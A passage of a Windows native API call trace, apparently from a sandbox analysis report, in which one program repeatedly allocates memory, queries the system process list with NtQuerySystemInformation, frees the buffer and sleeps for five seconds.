NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0227.194] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.195] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0227.196] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0227.196] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0227.197] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0227.197] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0227.198] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0227.298] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.299] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0227.300] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0227.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0227.302] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0227.302] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0227.302] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0227.420] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.421] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0227.423] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0227.424] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0227.425] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0227.425] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0227.425] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0227.558] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.559] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0227.560] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0227.561] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0227.562] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0227.562] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0227.563] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0227.703] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.704] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0227.705] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0227.706] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0227.706] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0227.707] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0227.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0227.841] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.843] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0227.845] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0227.845] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0227.846] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0227.846] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0227.846] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0227.953] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.954] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0227.955] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0227.956] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0227.956] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0227.957] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0227.957] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0228.057] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.058] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0228.059] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0228.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0228.060] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0228.061] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0228.061] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0228.165] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.166] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0228.167] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0228.168] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0228.169] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0228.169] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0228.169] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0228.268] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.269] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0228.270] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0228.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0228.271] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0228.271] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0228.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0228.371] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.372] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0228.373] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0228.374] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0228.374] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0228.375] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0228.375] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0228.497] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.498] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0228.499] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0228.499] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0228.500] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0228.500] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0228.500] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0228.598] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.599] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0228.601] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0228.601] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0228.602] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0228.602] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0228.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0228.704] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.705] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0228.706] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0228.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0228.708] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0228.708] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0228.708] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0228.808] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.808] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0228.810] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0228.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0228.811] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0228.811] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0228.811] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0228.916] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.917] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0228.918] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0228.919] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0228.919] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0228.920] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0228.920] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0229.058] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.058] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0229.060] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0229.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0229.061] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0229.061] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0229.061] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0229.158] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.159] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0229.161] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0229.161] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0229.162] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0229.162] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0229.163] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0229.262] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.263] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0229.264] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0229.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0229.265] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0229.266] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0229.266] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0229.364] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.364] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0229.366] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0229.366] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0229.367] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0229.367] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0229.367] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0229.484] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.485] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0229.486] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0229.487] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 